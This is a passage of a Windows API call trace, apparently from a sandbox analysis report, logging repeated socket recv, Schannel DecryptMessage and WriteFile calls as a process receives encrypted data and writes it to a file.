buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.468] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.469] DecryptMessage (in: phContext=0x376c308, pMessage=0x379c940, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379c940, pfQOP=0x0) returned 0x0 [0087.469] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.470] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.470] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.470] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ca54, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ca54, pfQOP=0x0) returned 0x0 [0087.470] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.470] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.470] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.470] DecryptMessage (in: phContext=0x376c308, pMessage=0x379cb68, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379cb68, pfQOP=0x0) returned 0x0 [0087.470] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.471] WriteFile (in: hFile=0x41c, lpBuffer=0x37889f5*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889f5*, lpNumberOfBytesWritten=0x13fed38*=0x1040, lpOverlapped=0x0) returned 1 [0087.471] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.471] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.471] DecryptMessage (in: phContext=0x376c308, pMessage=0x379cc7c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379cc7c, pfQOP=0x0) returned 0x0 [0087.471] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1085, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1085, lpOverlapped=0x0) returned 1 [0087.471] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.471] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.471] DecryptMessage (in: phContext=0x376c308, pMessage=0x379cd90, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379cd90, pfQOP=0x0) returned 0x0 [0087.471] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1085, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1085, lpOverlapped=0x0) returned 1 [0087.472] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.472] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.472] DecryptMessage (in: phContext=0x376c308, pMessage=0x379cea4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379cea4, pfQOP=0x0) returned 0x0 [0087.472] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1085, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1085, lpOverlapped=0x0) returned 1 [0087.472] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.472] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.472] DecryptMessage (in: phContext=0x376c308, pMessage=0x379cfb8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379cfb8, pfQOP=0x0) returned 0x0 [0087.472] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1085, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1085, lpOverlapped=0x0) returned 1 [0087.472] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.472] recv (in: s=0x5d4, buf=0x3781efd, len=3200, flags=0 | out: buf=0x3781efd*) returned 3200 [0087.472] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d0cc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d0cc, pfQOP=0x0) returned 0x0 [0087.472] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.473] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.473] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d1e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d1e0, pfQOP=0x0) returned 0x0 [0087.473] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.473] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.473] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.473] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d2f4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d2f4, pfQOP=0x0) returned 0x0 [0087.473] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.473] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.473] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.473] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d408, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d408, pfQOP=0x0) returned 0x0 [0087.474] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.474] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.474] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.474] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d51c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d51c, pfQOP=0x0) returned 0x0 [0087.474] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.474] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.474] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.475] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d630, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d630, pfQOP=0x0) returned 0x0 [0087.475] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.475] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.475] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.475] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d744, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d744, pfQOP=0x0) returned 0x0 [0087.475] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.475] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.475] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.475] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d858, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d858, pfQOP=0x0) returned 0x0 [0087.476] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.476] WriteFile (in: hFile=0x41c, lpBuffer=0x3788a35*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3788a35*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.476] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.476] recv (in: s=0x5d4, buf=0x3781efd, len=3200, flags=0 | out: buf=0x3781efd*) returned 3200 [0087.476] DecryptMessage (in: phContext=0x376c308, pMessage=0x379d96c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379d96c, pfQOP=0x0) returned 0x0 [0087.476] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.477] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.477] DecryptMessage (in: phContext=0x376c308, pMessage=0x379da80, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379da80, pfQOP=0x0) returned 0x0 [0087.477] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.477] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.477] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.477] DecryptMessage (in: phContext=0x376c308, pMessage=0x379db94, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379db94, pfQOP=0x0) returned 0x0 [0087.477] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.477] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.477] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.478] DecryptMessage (in: phContext=0x376c308, pMessage=0x379dca8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379dca8, pfQOP=0x0) returned 0x0 [0087.478] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.478] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.478] recv (in: s=0x5d4, buf=0x3781efd, len=3728, flags=0 | out: buf=0x3781efd*) returned 3728 [0087.478] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ddbc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ddbc, pfQOP=0x0) returned 0x0 [0087.478] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.478] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.478] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.478] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ded0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ded0, pfQOP=0x0) returned 0x0 [0087.478] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.479] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.479] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.479] DecryptMessage (in: phContext=0x376c308, pMessage=0x379dfe4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379dfe4, pfQOP=0x0) returned 0x0 [0087.479] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.479] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.479] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.479] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e0f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e0f8, pfQOP=0x0) returned 0x0 [0087.479] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.480] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.480] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.480] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e20c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e20c, pfQOP=0x0) returned 0x0 [0087.480] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.480] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.480] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.480] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e320, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e320, pfQOP=0x0) returned 0x0 [0087.480] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.484] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.484] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.484] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e434, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e434, pfQOP=0x0) returned 0x0 [0087.484] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.485] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.485] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.485] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e548, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e548, pfQOP=0x0) returned 0x0 [0087.485] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.492] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.492] recv (in: s=0x5d4, buf=0x3781efd, len=3200, flags=0 | out: buf=0x3781efd*) returned 3200 [0087.492] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e65c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e65c, pfQOP=0x0) returned 0x0 [0087.493] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.493] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.494] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e770, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e770, pfQOP=0x0) returned 0x0 [0087.494] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.494] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.494] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.494] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e884, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e884, pfQOP=0x0) returned 0x0 [0087.494] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.494] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.494] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.494] DecryptMessage (in: phContext=0x376c308, pMessage=0x379e998, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379e998, pfQOP=0x0) returned 0x0 [0087.494] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.495] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.495] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.498] DecryptMessage (in: phContext=0x376c308, pMessage=0x379eaac, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379eaac, pfQOP=0x0) returned 0x0 [0087.498] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.499] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.499] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.499] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ebc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ebc0, pfQOP=0x0) returned 0x0 [0087.499] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.499] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.499] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.499] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ecd4, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ecd4, pfQOP=0x0) returned 0x0 [0087.499] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.500] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.501] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.501] DecryptMessage (in: phContext=0x376c308, pMessage=0x379ede8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379ede8, pfQOP=0x0) returned 0x0 [0087.501] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.501] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.501] recv (in: s=0x5d4, buf=0x3781efd, len=3200, flags=0 | out: buf=0x3781efd*) returned 3200 [0087.501] DecryptMessage (in: phContext=0x376c308, pMessage=0x379eefc, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379eefc, pfQOP=0x0) returned 0x0 [0087.501] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.501] recv (in: s=0x5d4, buf=0x3781efd, len=4256, flags=0 | out: buf=0x3781efd*) returned 4256 [0087.501] DecryptMessage (in: phContext=0x376c308, pMessage=0x379f010, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379f010, pfQOP=0x0) returned 0x0 [0087.501] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.502] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.502] recv (in: s=0x5d4, buf=0x3781efd, len=8080, flags=0 | out: buf=0x3781efd*) returned 8080 [0087.502] DecryptMessage (in: phContext=0x376c308, pMessage=0x379f124, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x379f124, pfQOP=0x0) returned 0x0 [0087.502] WriteFile (in: hFile=0x41c, lpBuffer=0x3798a50*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x3798a50*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.502] recv (in: s=0x5d4, buf=0x3781ef8, len=5, flags=0 | out: buf=0x3781ef8*) returned 5 [0087.503] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.503] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a326c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a326c, pfQOP=0x0) returned 0x0 [0087.504] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.504] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.504] recv (in: s=0x5d4, buf=0x379f1b5, len=4128, flags=0 | out: buf=0x379f1b5*) returned 4128 [0087.504] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3380, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3380, pfQOP=0x0) returned 0x0 [0087.504] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.504] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.504] recv (in: s=0x5d4, buf=0x379f1b5, len=4128, flags=0 | out: buf=0x379f1b5*) returned 4128 [0087.512] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a3494, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a3494, pfQOP=0x0) returned 0x0 [0087.515] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x1000, lpOverlapped=0x0) returned 1 [0087.515] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.515] recv (in: s=0x5d4, buf=0x379f1b5, len=16416, flags=0 | out: buf=0x379f1b5*) returned 16416 [0087.516] DecryptMessage (in: phContext=0x376c308, pMessage=0x37a35a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x37a35a8, pfQOP=0x0) returned 0x0 [0087.516] WriteFile (in: hFile=0x41c, lpBuffer=0x37889b0*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x13fed38, lpOverlapped=0x0 | out: lpBuffer=0x37889b0*, lpNumberOfBytesWritten=0x13fed38*=0x4000, lpOverlapped=0x0) returned 1 [0087.517] recv (in: s=0x5d4, buf=0x379f1b0, len=5, flags=0 | out: buf=0x379f1b0*) returned 5 [0087.517] recv (in: 